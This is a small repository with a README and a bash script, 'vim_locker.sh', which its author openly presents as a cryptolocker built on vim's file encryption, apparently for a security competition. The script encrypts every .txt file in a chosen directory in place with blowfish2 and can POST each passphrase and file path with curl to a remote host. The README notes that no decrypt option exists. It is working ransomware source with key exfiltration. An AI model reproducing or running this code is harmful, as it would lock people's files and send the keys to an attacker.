├── README.md
└── vim_locker.sh


/README.md:
--------------------------------------------------------------------------------
 1 | # VIM Locker
 2 | 
 3 | Did you know vim can encrypt your files?... I didn't either! Once I found out, I knew I had weaponize it into a cryptolocker. So I did that.
 4 | 
 5 | ## Testing support for Vi & Vim
 6 | 
 7 | Because sometimes you don't have vim. :(
 8 | 
 9 | TODO:
10 | * Test all options thoroughly.
11 | * Test HOST option thoroughly.
12 | * Probably spelling errors. Lots of them I bet.
13 | * Stuff.
14 | * Oh, and a decrypt option would be nice, huh? :)
15 | 
16 | ## Options
17 | 
18 | ```
19 |   -H <IP>     Host ip to send encrpytion information to.
20 |   -P <PORT>   Host port to send encrpytion information to.
21 |   -e <PASS>   Set passphrase for file ( one is generated by default ).
22 |   -l <FILE>   Log application actions to a file ( off by default ).
23 |   -n          Generate a new passphrase for each file.
24 |   -v          Display version.
25 |   -h          Display this menu.
26 | ```
27 | ## Usage
28 | 
29 | I've built this tool to be very easy to use. Hopefully.
30 | 
31 | ### Typical
32 | 
33 | Typical useage to be able to cryptolock the files in a directory:
34 | 
35 | ```
36 | $ bash vim_locker.sh -d directory
37 | ```
38 | 
39 | ### Report to Host
40 | 
41 | If you want to report back to a host the files/passphrase, it's pretty simple:
42 | 
43 | ```
44 | $ bash vim_locker.sh -H 192.168.1.2 -P 80 -d directory
45 | ```
46 | 
47 | ### Custom Passphrase
48 | 
49 | If you would like to set a custom passphrase instead of having one generated for you.
50 | 
51 | ```
52 | $ bash vim_locker.sh -d directory -e reallystrongpassword
53 | ```
54 | 
55 | ### Help
56 | 
57 | Program should default to a help menu when no flags are specified or called with the `-h` option.
58 | 
59 | ```
60 | $ bash vim_locker.sh -h
61 | ```
62 | 
63 | ## Credits
64 | Kent 'picat' Gruber
65 | 
66 | #### Special Thanks
67 | 
68 | Wanted to give a shotout to [zmallen](https://github.com/zmallen) for some inspriation from his [LoLLocker](https://github.com/zmallen/lollocker). See you at ISTS this year? ;)
69 | 


--------------------------------------------------------------------------------
/vim_locker.sh:
--------------------------------------------------------------------------------
  1 | #!/bin/bash
  2 | # Kent 'picat' Gruber
  3 | 
  4 | # help_menu() provides a help menu
  5 | # for this application by echoing the
  6 | # available options out to the screen
  7 | help_menu() {
  8 |   echo -e "VIM CRYPTO LOCKER - What could go wrong?\n
  9 |   Typical use case:
 10 |   EX: ./vimlocker.sh -H 192.168.1.2 -P 80 -d directory -e reallystrongpassword
 11 |   Experimental use case:
 12 |   EX: ./vimlocker.sh -H 192.168.1.2 -P 80 -d directory -n
 13 | 
 14 |   OPTIONS:
 15 |   -H <IP>\tHost ip to send encrpytion information to.
 16 |   -P <PORT>\tHost port to send encrpytion information to.
 17 |   -e <PASS>\tSet passphrase for file ( one is generated by default ).
 18 |   -l <FILE>\tLog application actions to a file ( off by default ).
 19 |   -n\t\tGenerate a new passphrase for each file.
 20 |   -v\t\tDisplay version.
 21 |   -h\t\tDisplay this menu.
 22 |   "
 23 | }
 24 | 
 25 | # Detect vim or vi
 26 | if [ -x $(which vim) ]; then
 27 |   editor_path=$(which vim)
 28 | elif [ -x $(which vi) ]; then
 29 |   editor_path=$(which vi)
 30 | else
 31 |   echo "Error. Neither Vi or Vim are avaialable to decrypt files :("
 32 | fi
 33 | 
 34 | # If not arguments are provided, then do ahead
 35 | # and default to a nice little help menu.
 36 | if [ $# -eq 0 ]; then
 37 |   help_menu
 38 |   exit 1
 39 | fi
 40 | 
 41 | # Set defaults
 42 | host_given=false
 43 | port_give=false
 44 | passphrase_given=false
 45 | directory_given=false
 46 | new_each_given=false
 47 | log_given=false
 48 | 
 49 | # version() provides a simple means of checking
 50 | # the version of the application.
 51 | function version() {
 52 |   echo "Version 1.1"
 53 | }
 54 | 
 55 | function parseOpts() {
 56 | while getopts h,v,n,d:,l:,e:,H:,P:,D: opt; do
 57 |   case $opt in
 58 |     h) # Help
 59 |       help_menu
 60 |       exit 0
 61 |       ;;
 62 |     v) # Version check
 63 |       version
 64 |       exit 0
 65 |       ;;
 66 |     H) # Host ip to send information to
 67 |       host="$OPTARG"
 68 |       host_given=true
 69 |       ;;
 70 |     P) # Host port to send information to
 71 |       port="$OPTARG"
 72 |       port_given=true
 73 |       ;;
 74 |     e) # Set passphrase to use
 75 |       passphrase="$OPTARG"
 76 |       passphrase_given=true
 77 |       ;;
 78 |     d) # Directory to encrypt
 79 |       directory="$OPTARG"
 80 |       directory_given=true
 81 |       ;;
 82 |     l) # Log file to use
 83 |       log="$OPTARG"
 84 |       log_given=true
 85 |       ;;
 86 |     n) # New password each file
 87 |       new_each_given=true
 88 |       ;;
 89 |     \?) # Invalid arg
 90 |       echo "Invalid option: -$OPTARG"
 91 |       help_menu
 92 |       exit 1
 93 |       ;;
 94 |     :) # Missing arg
 95 |       echo "An argument must be specified for -$OPTARG"
 96 |       help_menu
 97 |       exit 1
 98 |       ;;
 99 |   esac
100 | done
101 | }
102 | 
103 | # Parse Arguments
104 | parseOpts "$@"
105 | 
106 | # Check directory options
107 | if $directory_given == false ; then
108 |   if [ ! -d $directory ]; then
109 |     echo "Error: $directory dosen't seem to be a directory!"
110 |     exit 1
111 |   fi
112 | else
113 |   echo "Error: No directory specified with the -d option!"
114 |   exit 1
115 | fi
116 | 
117 | # Check host options
118 | if $host_given; then
119 |   echo "[+] Host set to $host"
120 |   if $port_given; then
121 |     echo "[+] Host port set to $port"
122 |   else
123 |     echo "[*] No port set for host connection."
124 |     echo "[*] Setting to 80 as a default."
125 |     port="80"
126 |   fi
127 | fi
128 | 
129 | # Check passphrase options
130 | if $passphrase_given; then
131 |   echo "[*] Passphrase set to $passphrase"
132 | else
133 |   if $new_each_given; then
134 |     echo "[*] A new passphrase will be generated for each file."
135 |   else
136 |     passphrase=$($RANDOM$RANDOM | md5sum | awk '{print $1}')
137 |     echo "[*] Passphrase set to: $passphrase"
138 |   fi
139 | fi
140 | 
141 | # Files to encrypt
142 | type_files=( txt )
143 | black_list=$(echo ${type_files[@]} | sed 's/ /|/g' )
144 | 
145 | # Set encryption type
146 | encryption="blowfish2"
147 | echo "[*] Encryption method set to $encryption"
148 | 
149 | # Files to iterate through
150 | files=$(find $directory -type f)
151 | 
152 | # Iterate through files
153 | for file in $files
154 | do
155 |   # Encrypt the files that match the blacklist
156 |   if [[ $file =~ $black_list ]]; then
157 |     if $new_each_given; then
158 |       passphrase=$(echo $RANDOM$RANDOM | md5sum | awk '{print $1}')
159 |     fi
160 |     if $host_given; then
161 |       curl --data "encryption=$encryption&passphrase=$passphrase&file=$file" -X POST http://$host:$port
162 |     fi
163 |     if $log_given; then
164 |       echo "Encryption:'$encryption' Pass:'$passphrase'  File:'$file'" >> $log
165 |     fi
166 |     $editor_path --cmd "set key=$passphrase" --cmd "set cm=$encryption" -c wq $file
167 |     echo "[+] Encryption:$encryption Pass:$passphrase  File:$file"
168 |   fi
169 | done
170 | 


--------------------------------------------------------------------------------